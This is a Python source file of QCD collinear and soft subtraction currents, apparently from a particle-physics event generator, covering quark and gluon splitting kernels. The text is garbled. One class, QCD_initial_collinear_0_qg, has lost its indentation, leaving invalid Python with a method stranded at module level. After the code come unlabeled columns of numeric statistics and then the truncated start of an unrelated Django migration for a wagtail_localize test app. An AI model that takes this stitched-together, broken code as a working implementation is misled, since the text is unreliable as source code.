class QCD_final_collinear_0_gq(currents.QCDLocalCollinearCurrent):
    """g q collinear tree-level current."""

    @classmethod
    def does_implement_this_current(cls, current, model):
        """Return the initialization variables if `current` is a final-state,
        massless gluon-quark collinear structure (in either leg order);
        otherwise None."""
        # Check the general properties common to NLO QCD collinear tree-level currents
        init_vars = cls.common_does_implement_this_current(current, 2, 0)
        if init_vars is None: return None
        # Retrieve singular structure
        ss = current.get('singular_structure')
        # Check that all particles are massless final state
        for leg in ss.legs:
            if not cls.is_massless(leg, model): return None
            if cls.is_initial(leg): return None
        # Check that there are a quark and a gluon
        if len(ss.legs) != 2: return None
        if (cls.is_gluon(ss.legs[0], model) and cls.is_quark(ss.legs[1], model)):
            pass
        elif (cls.is_quark(ss.legs[0], model) and cls.is_gluon(ss.legs[1], model)):
            pass
        else:
            return None
        # The current is valid
        return init_vars

    @classmethod
    def get_sorted_children(cls, current, model):
        """Return the children leg numbers with the gluon first."""
        legs = current.get('singular_structure').legs
        if cls.is_gluon(legs[0], model): return (legs[0].n, legs[1].n)
        else: return (legs[1].n, legs[0].n)

    def evaluate_kernel(self, zs, kTs, parent):
        """Evaluate the soft-subtracted g q splitting kernel (CxS subtracted)."""
        # Retrieve the collinear variables
        z = zs[0]
        # Instantiate the structure of the result
        evaluation = utils.SubtractionCurrentEvaluation({
            'spin_correlations' : [None],
            'color_correlations' : [None],
            'values' : {(0, 0): {'finite': None}}
        })
        # We must subtract the soft-collinear (CxS *not* SxC) from this contribution:
        # P_gq = self.CF * ((1.-z)**2 + 1.)/z
        # CxS(P_gq) = self.CF * 2.*(1.-z) / z
        # SxC(P_gq) = self.CF * 2. / z
        # P_gq-CxS(P_gq) = self.CF * z
        # P_gq-SxC(P_gq) = self.CF * ((1.-z)**2 - 1.)/z
        evaluation['values'][(0, 0)]['finite'] = self.CF * z
        return evaluation

    def evaluate_subtraction_current(
        self, current,
        higher_PS_point=None, lower_PS_point=None,
        leg_numbers_map=None, reduced_process=None, hel_config=None,
        Q=None, **opts ):
        """Evaluate this current: the collinear kernel plus partial-fractioned
        soft eikonal pieces distributed over the colored spectators.

        Raises CurrentImplementationError when a required keyword argument is
        missing or a helicity assignment is requested.
        """
        if higher_PS_point is None or lower_PS_point is None:
            raise CurrentImplementationError(
                self.name() + " needs the phase-space points before and after mapping." )
        if leg_numbers_map is None:
            raise CurrentImplementationError(
                self.name() + " requires a leg numbers map, i.e. a momentum dictionary." )
        if reduced_process is None:
            raise CurrentImplementationError(
                self.name() + " requires a reduced_process.")
        if not hel_config is None:
            raise CurrentImplementationError(
                self.name() + " does not support helicity assignment." )
        if Q is None:
            raise CurrentImplementationError(
                self.name() + " requires the total mapping momentum Q." )
        # Retrieve alpha_s and mu_r
        model_param_dict = self.model.get('parameter_dict')
        alpha_s = model_param_dict['aS']
        mu_r = model_param_dict['MU_R']
        # Include the counterterm only in a part of the phase space
        children = self.get_sorted_children(current, self.model)
        parent = leg_numbers_map.inv[frozenset(children)]
        pC = sum(higher_PS_point[child] for child in children)
        qC = lower_PS_point[parent]
        if self.is_cut(Q=Q, pC=pC):
            return utils.SubtractionCurrentResult.zero(
                current=current, hel_config=hel_config)
        # Evaluate collinear subtracted kernel
        zs, kTs = self.variables(higher_PS_point, lower_PS_point[parent], children, Q=Q)
        evaluation = self.evaluate_kernel(zs, kTs, parent)
        # Find all colored leg numbers except for the parent in the reduced process
        all_colored_parton_numbers = []
        for leg in reduced_process.get('legs'):
            # Skip color singlets (color charge 1).
            if self.model.get_particle(leg.get('id')).get('color') == 1:
                continue
            all_colored_parton_numbers.append(leg.get('number'))
        color_correlation_index = 1
        # ps: momentum of the gluon child (listed first by get_sorted_children);
        # pi: momentum of the quark child.
        ps = higher_PS_point[children[0]]
        pi = higher_PS_point[children[1]]
        # Now loop over the colored parton number pairs (parent, j)
        # and add the corresponding contributions to this current
        for j in all_colored_parton_numbers:
            # Write the eikonal for that pair
            if j == parent:
                continue
            # pj = sum(higher_PS_point[child] for child in leg_numbers_map[j])
            # pj = higher_PS_point[j]
            qj = lower_PS_point[j]
            evaluation['color_correlations'].append(((parent, j),))
            # eiks = -mod_eikonal(pi, pj, ps)
            # Rescale the mapped spectator momentum qj before forming the eikonal.
            mod = (qj.dot(qC)) / (qj.dot(pi+ps))
            qjmod = mod * qj
            eiks = -mod_eikonal(pi, qjmod, ps)
            evaluation['values'][(0, color_correlation_index)] = {'finite': eiks}
            color_correlation_index += 1
        # Add the normalization factors
        pC2 = pC.square()
        norm = 8. * math.pi * alpha_s / pC2
        norm *= self.factor(Q=Q, pC=pC, qC=qC)
        for k in evaluation['values']:
            evaluation['values'][k]['finite'] *= norm
        # Construct and return result
        result = utils.SubtractionCurrentResult()
        result.add_result(
            evaluation,
            hel_config=hel_config,
            squared_orders=tuple(sorted(current.get('squared_orders').items())))
        return result
class QCD_final_collinear_0_gg(currents.QCDLocalCollinearCurrent):
    """g g collinear tree-level current."""

    @classmethod
    def does_implement_this_current(cls, current, model):
        """Return the initialization variables if `current` is a pair of
        final-state massless gluons; otherwise None."""
        # Check the general properties common to NLO QCD collinear tree-level currents
        init_vars = cls.common_does_implement_this_current(current, 2, 0)
        if init_vars is None: return None
        # Retrieve singular structure
        ss = current.get('singular_structure')
        # Check that the particles are two final-state massless gluons
        if len(ss.legs) != 2: return None
        for leg in ss.legs:
            if not cls.is_gluon(leg, model): return None
            if not cls.is_massless(leg, model): return None
            if cls.is_initial(leg): return None
        # The current is valid
        return init_vars

    @classmethod
    def get_sorted_children(cls, current, model):
        """Return the children leg numbers in singular-structure order."""
        legs = current.get('singular_structure').legs
        return tuple(leg.n for leg in legs)

    def evaluate_kernel(self, zs, kTs, parent):
        """Evaluate the soft-subtracted g g splitting kernel, returning a
        spin-uncorrelated piece (0, 0) and a kT spin-correlated piece (1, 0)."""
        # Retrieve the collinear variables
        z = zs[0]
        kT = kTs[0]
        # Instantiate the structure of the result
        evaluation = utils.SubtractionCurrentEvaluation({
            'spin_correlations' : [None, ((parent,( kT, )), ), ],
            'color_correlations' : [None],
            'values' : {(0, 0): {'finite': None},
                        (1, 0): {'finite': None}, }
        })
        # The line below implements the g_{\mu\nu} part of the splitting kernel.
        # Notice that the extra longitudinal terms included in the spin-correlation 'None'
        # from the relation:
        #    \sum_\lambda \epsilon_\lambda^\mu \epsilon_\lambda^{\star\nu}
        #    = g^{\mu\nu} + longitudinal terms
        # are irrelevant because Ward identities evaluate them to zero anyway.
        # We must subtract the soft-collinear (CxS *not* SxC) from this contribution:
        # P_gg = 2.*self.CA * ( (1.-z) / z + z / (1.- z) )
        # CxS(P_gg) = 2.*self.CA * ( (1.-z) / z + z / (1.- z) )
        # SxC(P_gg) = 2.*self.CA * ( 1 / z + 1 / (1.- z) )
        # P_gg-CxS(P_gg) = 0
        # P_gg-SxC(P_gg) = -4.*self.CA
        evaluation['values'][(0, 0)]['finite'] = -4.*self.CA
        evaluation['values'][(1, 0)]['finite'] = -2.*self.CA * 2.*z*(1.-z) / kT.square()
        return evaluation

    def evaluate_subtraction_current(
        self, current,
        higher_PS_point=None, lower_PS_point=None,
        leg_numbers_map=None, reduced_process=None, hel_config=None,
        Q=None, **opts ):
        """Evaluate this current: the collinear kernel plus eikonal pieces
        (one per gluon child) distributed over the colored spectators.

        Raises CurrentImplementationError when a required keyword argument is
        missing or a helicity assignment is requested.
        """
        if higher_PS_point is None or lower_PS_point is None:
            raise CurrentImplementationError(
                self.name() + " needs the phase-space points before and after mapping." )
        if leg_numbers_map is None:
            raise CurrentImplementationError(
                self.name() + " requires a leg numbers map, i.e. a momentum dictionary." )
        if reduced_process is None:
            raise CurrentImplementationError(
                self.name() + " requires a reduced_process.")
        if not hel_config is None:
            raise CurrentImplementationError(
                self.name() + " does not support helicity assignment." )
        if Q is None:
            raise CurrentImplementationError(
                self.name() + " requires the total mapping momentum Q." )
        # Retrieve alpha_s and mu_r
        model_param_dict = self.model.get('parameter_dict')
        alpha_s = model_param_dict['aS']
        mu_r = model_param_dict['MU_R']
        # Include the counterterm only in a part of the phase space
        children = self.get_sorted_children(current, self.model)
        parent = leg_numbers_map.inv[frozenset(children)]
        pC = sum(higher_PS_point[child] for child in children)
        qC = lower_PS_point[parent]
        if self.is_cut(Q=Q, pC=pC):
            return utils.SubtractionCurrentResult.zero(
                current=current, hel_config=hel_config)
        # Evaluate collinear subtracted kernel
        zs, kTs = self.variables(higher_PS_point, lower_PS_point[parent], children, Q=Q)
        evaluation = self.evaluate_kernel(zs, kTs, parent)
        # Find all colored leg numbers except for the parent in the reduced process
        all_colored_parton_numbers = []
        for leg in reduced_process.get('legs'):
            # Skip color singlets (color charge 1).
            if self.model.get_particle(leg.get('id')).get('color') == 1:
                continue
            all_colored_parton_numbers.append(leg.get('number'))
        color_correlation_index = 1
        p0 = higher_PS_point[children[0]]
        p1 = higher_PS_point[children[1]]
        # Loop over the colored parton number pairs (parent, j)
        # and add the corresponding contributions to this current
        for j in all_colored_parton_numbers:
            # Write the eikonal for that pair
            if j == parent:
                continue
            # pj = higher_PS_point[j]
            # pj = sum(higher_PS_point[child] for child in leg_numbers_map[j])
            qj = lower_PS_point[j]
            # eik0 = -mod_eikonal(pj, p1, p0)
            # eik1 = -mod_eikonal(pj, p0, p1)
            # Either gluon child can become soft: one eikonal term each.
            eik0 = -mod_eikonal(qj, qC, p0)
            eik1 = -mod_eikonal(qj, qC, p1)
            evaluation['color_correlations'].append(((parent, j),))
            evaluation['values'][(0, color_correlation_index)] = {'finite': eik0 + eik1}
            color_correlation_index += 1
        # Add the normalization factors
        pC2 = pC.square()
        norm = 8. * math.pi * alpha_s / pC2
        norm *= self.factor(Q=Q, pC=pC, qC=qC)
        for k in evaluation['values']:
            evaluation['values'][k]['finite'] *= norm
        # Construct and return result
        result = utils.SubtractionCurrentResult()
        result.add_result(
            evaluation,
            hel_config=hel_config,
            squared_orders=tuple(sorted(current.get('squared_orders').items())))
        return result
#=========================================================================================
# NLO initial-collinear currents, containing the soft limits
#=========================================================================================
class QCD_initial_collinear_0_gq(currents.QCDLocalCollinearCurrent):
    """gq collinear ISR tree-level current.
    q(initial) > g(initial_after_emission) q(final)
    """

    variables = staticmethod(currents.Q_initial_coll_variables)

    @classmethod
    def does_implement_this_current(cls, current, model):
        """Return the initialization variables if `current` has exactly one
        initial-state quark and one final-state quark; otherwise None."""
        # Check the general properties common to NLO QCD collinear tree-level currents
        init_vars = cls.common_does_implement_this_current(current, 2, 0)
        if init_vars is None: return None
        # Retrieve singular structure
        ss = current.get('singular_structure')
        # Check that the particles are a massless quark and its anti-quark in final-state
        if len(ss.legs) != 2: return None
        n_initial_state_quarks = 0
        for leg in ss.legs:
            if cls.is_quark(leg, model) and cls.is_initial(leg):
                n_initial_state_quarks += 1
        if n_initial_state_quarks != 1: return None
        n_final_state_quarks = 0
        for leg in ss.legs:
            if cls.is_quark(leg, model) and not cls.is_initial(leg):
                n_final_state_quarks += 1
        if n_final_state_quarks != 1: return None
        # The current is valid
        return init_vars

    @classmethod
    def get_sorted_children(cls, current, model):
        """Return the children leg numbers, initial-state child first."""
        legs = current.get('singular_structure').legs
        # Always put the initial state child first
        children_numbers = [leg.n for leg in legs if leg.state == leg.INITIAL]
        # Then the final state ones
        children_numbers.extend([leg.n for leg in legs if leg.state == leg.FINAL])
        return tuple(children_numbers)

    def evaluate_kernel(self, xs, kTs, parent):
        """Evaluate the ISR gq splitting kernel in the momentum fraction x,
        returning a spin-uncorrelated piece (0, 0) and a kT spin-correlated
        piece (1, 0)."""
        # Retrieve the collinear variable x
        x = xs[0]
        kT = kTs[0]
        evaluation = utils.SubtractionCurrentEvaluation({
            'spin_correlations' : [None, ((parent, (kT, )), ), ],
            'color_correlations' : [None],
            'values' : {(0, 0): {'finite': None},
                        (1, 0): {'finite': None}, }
        })
        # The factor 'x' that should be part of the initial_state_crossing_factor cancels
        # against the extra prefactor 1/x in the collinear factorization formula
        # (see Eq. (8) of NNLO compatible NLO scheme publication arXiv:0903.1218v2)
        initial_state_crossing_factor = -1.
        # Correct for the ratio of color-averaging factor between the real ME
        # initial state flavor (quark) and the one of the reduced Born ME (gluon)
        initial_state_crossing_factor *= ((self.NC**2-1)/float(self.NC))
        z = 1./x
        # We re-use here the Altarelli-Parisi Kernel of the P_q\bar{q} final state kernel
        # The line below implements the g_{\mu\nu} part of the splitting kernel.
        # Notice that the extra longitudinal terms included in the spin-correlation 'None'
        # from the relation:
        #    \sum_\lambda \epsilon_\lambda^\mu \epsilon_\lambda^{\star\nu}
        #    = g^{\mu\nu} + longitudinal terms
        # are irrelevant because Ward identities evaluate them to zero anyway.
        norm = initial_state_crossing_factor * self.TR
        evaluation['values'][(0, 0)]['finite'] = norm
        evaluation['values'][(1, 0)]['finite'] = norm * 4. * z*(1.-z) / kT.square()
        return evaluation
class QCD_initial_collinear_0_qq(currents.QCDLocalCollinearCurrent):
    """ qq collinear ISR tree-level current.
    g(initial) > q(initial_after_emission) qx(final).
    """

    variables = staticmethod(currents.Q_initial_coll_variables)

    @classmethod
    def does_implement_this_current(cls, current, model):
        """Return the initialization variables if `current` has exactly one
        initial-state gluon and one final-state quark; otherwise None."""
        # Check the general properties common to NLO QCD collinear tree-level currents
        init_vars = cls.common_does_implement_this_current(current, 2, 0)
        if init_vars is None: return None
        # Retrieve singular structure
        ss = current.get('singular_structure')
        if len(ss.legs) != 2: return None
        n_initial_state_gluons = 0
        for leg in ss.legs:
            if cls.is_gluon(leg, model) and cls.is_initial(leg):
                n_initial_state_gluons += 1
        if n_initial_state_gluons != 1: return None
        n_final_state_quarks = 0
        for leg in ss.legs:
            if cls.is_quark(leg, model) and not cls.is_initial(leg):
                n_final_state_quarks += 1
        if n_final_state_quarks != 1: return None
        # The current is valid
        return init_vars

    @classmethod
    def get_sorted_children(cls, current, model):
        """Return the children leg numbers, initial-state child first."""
        legs = current.get('singular_structure').legs
        # Always put the initial state child first
        children_numbers = [leg.n for leg in legs if leg.state == leg.INITIAL]
        # Then the final state ones
        children_numbers.extend([leg.n for leg in legs if leg.state == leg.FINAL])
        return tuple(children_numbers)

    def evaluate_kernel(self, xs, kTs, parent):
        """Evaluate the ISR qq splitting kernel in the momentum fraction x."""
        # Retrieve the collinear variable x
        x = xs[0]
        # Instantiate the structure of the result
        evaluation = utils.SubtractionCurrentEvaluation({
            'spin_correlations' : [None],
            'color_correlations' : [None],
            'values' : {(0, 0): {'finite': None}}
        })
        # The factor 'x' that should be part of the initial_state_crossing_factor cancels
        # against the extra prefactor 1/x in the collinear factorization formula
        # (see Eq. (8) of NNLO compatible NLO scheme publication arXiv:0903.1218v2)
        initial_state_crossing_factor = 1.
        # Correct for the ratio of color-averaging factor between the real ME
        # initial state flavor (gluon) and the one of the reduced Born ME (quark)
        initial_state_crossing_factor *= (self.NC/float(self.NC**2-1))
        z = 1./x
        norm = initial_state_crossing_factor * self.CF
        # We re-use here the Altarelli-Parisi Kernel of the P_gq final state kernel without
        # the soft-subtraction term 2./z since the gluon is here in the initial state
        evaluation['values'][(0, 0)]['finite'] = norm * (1. + (1.-z)**2) / z
        return evaluation
class QCD_initial_collinear_0_qg(currents.QCDLocalCollinearCurrent):
"""qg collinear ISR tree-level current.
q(initial) > q(initial_after_emission) g(final)
"""
variables = staticmethod(currents.Q_initial_coll_variables)
@classmethod
def does_implement_this_current(cls, current, model):
# Check the general properties common to NLO QCD collinear tree-level currents
init_vars = cls.common_does_implement_this_current(current, 2, 0)
if init_vars is None: return None
# Retrieve singular structure
ss = current.get('singular_structure')
if len(ss.legs) != 2: return None
n_initial_state_quarks = 0
for leg in ss.legs:
if cls.is_quark(leg, model) and cls.is_initial(leg):
n_initial_state_quarks += 1
if n_initial_state_quarks != 1: return None
n_final_state_gluon = 0
for leg in ss.legs:
if cls.is_gluon(leg, model) and not cls.is_initial(leg):
n_final_state_gluon += 1
if n_final_state_gluon != 1: return None
# The current is valid
return init_vars
@classmethod
def get_sorted_children(cls, current, model):
legs = current.get('singular_structure').legs
# Always put the initial state child first
children_numbers = [leg.n for leg in legs if leg.state == leg.INITIAL]
# Then the final state ones
children_numbers.extend([leg.n for leg in legs if leg.state == leg.FINAL])
return tuple(children_numbers)
def evaluate_kernel(self, xs, kTs, parent):
# Retrieve the collinear variable x
x = xs[0]
# Instantiate the structure of the result
evaluation = utils.SubtractionCurrentEvaluation({
'spin_correlations' : [None],
'color_correlations' : [None],
'values' : {(0, 0): {'finite': None}}
})
# The factor 'x' that should be part of the initial_state_crossing_factor cancels
# against the extra prefactor 1/x in the collinear factorization formula
# (see Eq. (8) of NNLO compatible NLO scheme publication arXiv:0903.1218v2)
initial_state_crossing_factor = 1.
# Correct for the ratio of color-averaging factor between the real ME
# initial state flavor (quark) and the one of the reduced Born ME (quark)
initial_state_crossing_factor *= 1.
z = 1./x
# We re-use here the Altarelli-Parisi Kernel of the P_qg final state kernel, including
# its soft subtraction
# We must subtract the soft-collinear (CxS *not* SxC) from this contribution:
# P_qg = self.CF * ( (1.+z**2)/(1.-z) )
# CxS(P_qg) = self.CF * ( 2 / (x - 1) ) = self.CF * ( 2 z / (1 - z) )
# P_qg-CxS(P_qg) = self.CF * (1 + z**2 - 2*z) / (1 - z) = self.CF * ( 1 - z)
norm = initial_state_crossing_factor * self.CF
evaluation['values'][(0, 0)]['finite'] = norm * (1 - z)
return evaluation
def evaluate_subtraction_current(
    self, current,
    higher_PS_point=None, lower_PS_point=None,
    leg_numbers_map=None, reduced_process=None, hel_config=None,
    Q=None, **opts ):
    """Add the distributed partial fractioned soft eikonal approximation
    to this hard collinear current
    """
    # All kinematic inputs are mandatory; fail loudly if any is missing.
    if higher_PS_point is None or lower_PS_point is None:
        raise CurrentImplementationError(
            self.name() + " needs the phase-space points before and after mapping." )
    if leg_numbers_map is None:
        raise CurrentImplementationError(
            self.name() + " requires a leg numbers map, i.e. a momentum dictionary." )
    if reduced_process is None:
        raise CurrentImplementationError(
            self.name() + " requires a reduced_process.")
    if not hel_config is None:
        raise CurrentImplementationError(
            self.name() + " does not support helicity assignment." )
    if Q is None:
        raise CurrentImplementationError(
            self.name() + " requires the total mapping momentum Q." )
    # Retrieve alpha_s and mu_r.
    # mu_r is fetched for interface consistency but is not used below.
    model_param_dict = self.model.get('parameter_dict')
    alpha_s = model_param_dict['aS']
    mu_r = model_param_dict['MU_R']
    # Include the counterterm only in a part of the phase space:
    # pC = p(initial child) - sum of final-state children momenta.
    children = self.get_sorted_children(current, self.model)
    parent = leg_numbers_map.inv[frozenset(children)]
    pC = higher_PS_point[children[0]]
    # NOTE(review): '-=' is in-place; if the stored momentum object is
    # mutable this also modifies higher_PS_point[children[0]], which is
    # re-read as 'pi' below — confirm the vector type copies on subtraction.
    pC -= sum(higher_PS_point[child] for child in children[1:])
    if self.is_cut(Q=Q, pC=pC):
        return utils.SubtractionCurrentResult.zero(
            current=current, hel_config=hel_config)
    # Evaluate collinear subtracted kernel
    zs, kTs = self.variables(higher_PS_point, lower_PS_point[parent], children, Q=Q)
    evaluation = self.evaluate_kernel(zs, kTs, parent)
    # Find all colored leg numbers in the reduced process
    # (particles with color quantum number 1, i.e. singlets, are skipped).
    all_colored_parton_numbers = []
    for leg in reduced_process.get('legs'):
        if self.model.get_particle(leg.get('id')).get('color') == 1:
            continue
        all_colored_parton_numbers.append(leg.get('number'))
    color_correlation_index = 1
    ps = higher_PS_point[children[1]]  # final-state (soft) child momentum
    pi = higher_PS_point[children[0]]  # initial-state child momentum
    # pi = lower_PS_point[parent]
    # Loop over the colored parton number pairs (parent, j)
    # and add the corresponding contributions to this current
    for j in all_colored_parton_numbers:
        # Write the eikonal for that pair
        # (positive here since the dipole end 'children[0]' is in the initial state)
        if j == parent:
            continue
        pj = higher_PS_point[j]
        # pj = sum(higher_PS_point[child] for child in leg_numbers_map[j])
        # pj = lower_PS_point[j]
        eik1 = mod_eikonal(pi, pj, ps)
        evaluation['color_correlations'].append(((parent, j),))
        evaluation['values'][(0, color_correlation_index)] = {'finite': eik1}
        color_correlation_index += 1
    # Add the normalization factors: 8 pi alpha_s / pC^2 times the mapping factor.
    pC2 = pC.square()
    norm = 8. * math.pi * alpha_s / pC2
    norm *= self.factor(Q=Q, pC=pC)
    for k in evaluation['values']:
        evaluation['values'][k]['finite'] *= norm
    # Construct and return result
    result = utils.SubtractionCurrentResult()
    result.add_result(
        evaluation,
        hel_config=hel_config,
        squared_orders=tuple(sorted(current.get('squared_orders').items())))
    return result
class QCD_initial_collinear_0_gg(currents.QCDLocalCollinearCurrent):
    """gg collinear ISR tree-level current. g(initial) > g(initial_after_emission) g(final)"""

    # Kinematic variables generator for initial-state collinear configurations.
    variables = staticmethod(currents.Q_initial_coll_variables)

    @classmethod
    def does_implement_this_current(cls, current, model):
        """Return init variables if this class implements `current`, else None.

        Accepts a two-leg singular structure with exactly one initial-state
        gluon and exactly one final-state gluon.
        """
        # Check the general properties common to NLO QCD collinear tree-level currents
        init_vars = cls.common_does_implement_this_current(current, 2, 0)
        if init_vars is None: return None
        # Retrieve singular structure
        ss = current.get('singular_structure')
        if len(ss.legs) != 2: return None
        n_initial_state_gluons = 0
        for leg in ss.legs:
            if cls.is_gluon(leg, model) and cls.is_initial(leg):
                n_initial_state_gluons += 1
        if n_initial_state_gluons != 1: return None
        n_final_state_gluons = 0
        for leg in ss.legs:
            if cls.is_gluon(leg, model) and not cls.is_initial(leg):
                n_final_state_gluons += 1
        if n_final_state_gluons != 1: return None
        # The current is valid
        return init_vars

    @classmethod
    def get_sorted_children(cls, current, model):
        """Return the legs' numbers, initial-state child first, then final-state ones."""
        legs = current.get('singular_structure').legs
        # Always put the initial state child first
        children_numbers = [leg.n for leg in legs if leg.state == leg.INITIAL]
        # Then the final state ones
        children_numbers.extend([leg.n for leg in legs if leg.state == leg.FINAL])
        return tuple(children_numbers)

    def evaluate_kernel(self, xs, kTs, parent):
        """Evaluate the soft-subtracted g(initial) -> g g collinear kernel.

        Fills two entries: (0, 0) for the g_{mu nu} part and (1, 0) for the
        kT-dependent spin-correlated part of the gluon splitting.
        """
        # Retrieve the collinear variable x
        x = xs[0]
        kT = kTs[0]
        # Instantiate the structure of the result
        evaluation = utils.SubtractionCurrentEvaluation({
            'spin_correlations' : [None, ((parent,( kT, )), ), ],
            'color_correlations' : [None],
            'values' : {(0, 0): {'finite': None},
                        (1, 0): {'finite': None}, }
        })
        # The factor 'x' that should be part of the initial_state_crossing_factor cancels
        # against the extra prefactor 1/x in the collinear factorization formula
        # (see Eq. (8) of NNLO compatible NLO scheme publication arXiv:0903.1218v2)
        initial_state_crossing_factor = 1.
        # Correct for the ratio of color-averaging factor between the real ME
        # initial state flavor (gluon) and the one of the reduced Born ME (gluon)
        initial_state_crossing_factor *= 1.
        z = 1./x
        # The line below implements the g_{\mu\nu} part of the splitting kernel.
        # Notice that the extra longitudinal terms included in the spin-correlation 'None'
        # from the relation:
        #    \sum_\lambda \epsilon_\lambda^\mu \epsilon_\lambda^{\star\nu}
        #      = g^{\mu\nu} + longitudinal terms
        # are irrelevant because Ward identities evaluate them to zero anyway.
        # We re-use here the Altarelli-Parisi Kernel of the P_qg final state kernel, including
        # its soft subtraction
        # We must subtract the soft-collinear (CxS *not* SxC) from this contribution:
        #    P_gg           = 2.*self.CA * ( (z/(1.-z)) + ((1.-z)/z) )
        #    CxS(P_gg)      = 2.*self.CA * ( (z/(1.-z)) )
        #    P_gg-CxS(P_gg) = 2.*self.CA * ((1.-z)/z)
        norm = initial_state_crossing_factor * 2. * self.CA
        evaluation['values'][(0, 0)]['finite'] = norm * ((1.-z)/z)
        evaluation['values'][(1, 0)]['finite'] = -norm * 2.*z*(1.-z) / kT.square()
        return evaluation

    def evaluate_subtraction_current(
        self, current,
        higher_PS_point=None, lower_PS_point=None,
        leg_numbers_map=None, reduced_process=None, hel_config=None,
        Q=None, **opts ):
        """Add the distributed partial fractioned soft eikonal approximation
        to this hard collinear current
        """
        # All kinematic inputs are mandatory; fail loudly if any is missing.
        if higher_PS_point is None or lower_PS_point is None:
            raise CurrentImplementationError(
                self.name() + " needs the phase-space points before and after mapping." )
        if leg_numbers_map is None:
            raise CurrentImplementationError(
                self.name() + " requires a leg numbers map, i.e. a momentum dictionary." )
        if reduced_process is None:
            raise CurrentImplementationError(
                self.name() + " requires a reduced_process.")
        if not hel_config is None:
            raise CurrentImplementationError(
                self.name() + " does not support helicity assignment." )
        if Q is None:
            raise CurrentImplementationError(
                self.name() + " requires the total mapping momentum Q." )
        # Retrieve alpha_s and mu_r.
        # mu_r is fetched for interface consistency but is not used below.
        model_param_dict = self.model.get('parameter_dict')
        alpha_s = model_param_dict['aS']
        mu_r = model_param_dict['MU_R']
        # Include the counterterm only in a part of the phase space:
        # pC = p(initial child) - sum of final-state children momenta.
        children = self.get_sorted_children(current, self.model)
        parent = leg_numbers_map.inv[frozenset(children)]
        pC = higher_PS_point[children[0]]
        # NOTE(review): '-=' is in-place; if the stored momentum object is
        # mutable this also modifies higher_PS_point[children[0]], which is
        # re-read as 'pi' below — confirm the vector type copies on subtraction.
        pC -= sum(higher_PS_point[child] for child in children[1:])
        if self.is_cut(Q=Q, pC=pC):
            return utils.SubtractionCurrentResult.zero(
                current=current, hel_config=hel_config)
        # Evaluate collinear subtracted kernel
        zs, kTs = self.variables(higher_PS_point, lower_PS_point[parent], children, Q=Q)
        evaluation = self.evaluate_kernel(zs, kTs, parent)
        # Find all colored leg numbers in the reduced process
        # (particles with color quantum number 1, i.e. singlets, are skipped).
        all_colored_parton_numbers = []
        for leg in reduced_process.get('legs'):
            if self.model.get_particle(leg.get('id')).get('color') == 1:
                continue
            all_colored_parton_numbers.append(leg.get('number'))
        color_correlation_index = 1
        ps = higher_PS_point[children[1]]  # final-state (soft) child momentum
        pi = higher_PS_point[children[0]]  # initial-state child momentum
        # pi = lower_PS_point[parent]
        # Loop over the colored parton number pairs (parent, j)
        # and add the corresponding contributions to this current
        for j in all_colored_parton_numbers:
            # Write the eikonal for that pair
            # (positive here since the dipole end 'children[0]' is in the initial state)
            if j == parent:
                continue
            pj = higher_PS_point[j]
            # pj = sum(higher_PS_point[child] for child in leg_numbers_map[j])
            # pj = lower_PS_point[j]
            eik1 = mod_eikonal(pi, pj, ps)
            evaluation['color_correlations'].append(((parent, j),))
            evaluation['values'][(0, color_correlation_index)] = {'finite': eik1}
            color_correlation_index += 1
        # Add the normalization factors: 8 pi alpha_s / pC^2 times the mapping factor.
        pC2 = pC.square()
        norm = 8. * math.pi * alpha_s / pC2
        norm *= self.factor(Q=Q, pC=pC)
        for k in evaluation['values']:
            evaluation['values'][k]['finite'] *= norm
        # Construct and return result
        result = utils.SubtractionCurrentResult()
        result.add_result(
            evaluation,
            hel_config=hel_config,
            squared_orders=tuple(sorted(current.get('squared_orders').items())))
        return result
#=========================================================================================
# NLO soft current
#=========================================================================================
class NoSoftCurrent(currents.QCDCurrent):
    """Trivial current returning zero for any NLO limit containing softs."""

    # Flag consumed by the framework: this current always evaluates to zero.
    is_zero = True

    @classmethod
    def does_implement_this_current(cls, current, model):
        """Match both pure-soft and soft-collinear NLO QCD tree-level structures."""
        for soft_class in (currents.QCDLocalSoftCurrent,
                           currents.QCDLocalSoftCollinearCurrent):
            init_vars = soft_class.common_does_implement_this_current(current, 2, 0)
            if init_vars is not None:
                return init_vars
        return None

    def evaluate_subtraction_current(
        self, current, hel_config=None, **opts ):
        """Return 0 for this current."""
        return utils.SubtractionCurrentResult.zero(current=current, hel_config=hel_config)
| 42.24297
| 94
| 0.605102
| 4,703
| 37,554
| 4.673825
| 0.079524
| 0.017197
| 0.020108
| 0.033665
| 0.912743
| 0.884218
| 0.869433
| 0.847186
| 0.837405
| 0.830626
| 0
| 0.011433
| 0.278
| 37,554
| 888
| 95
| 42.290541
| 0.799255
| 0.295281
| 0
| 0.870334
| 0
| 0
| 0.076979
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05501
| false
| 0.003929
| 0.007859
| 0
| 0.153242
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cb2dec0845e74fbef60099ea717533927237e6d9
| 9,597
|
py
|
Python
|
wagtail_localize/test/migrations/0001_initial.py
|
KalobTaulien/wagtail-localize
|
e513d18dea5f76f6941f1acf55f945150de767eb
|
[
"BSD-3-Clause"
] | 123
|
2019-11-21T12:55:04.000Z
|
2022-03-23T08:08:47.000Z
|
wagtail_localize/test/migrations/0001_initial.py
|
KalobTaulien/wagtail-localize
|
e513d18dea5f76f6941f1acf55f945150de767eb
|
[
"BSD-3-Clause"
] | 334
|
2019-11-20T10:40:08.000Z
|
2022-03-27T17:33:01.000Z
|
wagtail_localize/test/migrations/0001_initial.py
|
KalobTaulien/wagtail-localize
|
e513d18dea5f76f6941f1acf55f945150de767eb
|
[
"BSD-3-Clause"
] | 41
|
2020-01-16T17:24:52.000Z
|
2022-03-28T13:09:59.000Z
|
# Generated by Django 3.0.6 on 2020-07-17 15:07
from django.db import migrations, models
import django.db.models.deletion
import modelcluster.fields
import uuid
import wagtail.core.blocks
import wagtail.core.fields
import wagtail_localize.test.models
class Migration(migrations.Migration):
    """Initial schema for the wagtail_localize test app (auto-generated).

    NOTE: migration files are frozen history — do not hand-edit operations.
    """

    initial = True

    # Requires wagtailcore's non-null locale fields on Page.
    dependencies = [
        ('wagtailcore', '0057_page_locale_fields_notnull'),
    ]

    operations = [
        # Bare Page subclass used as the site root in tests.
        migrations.CreateModel(
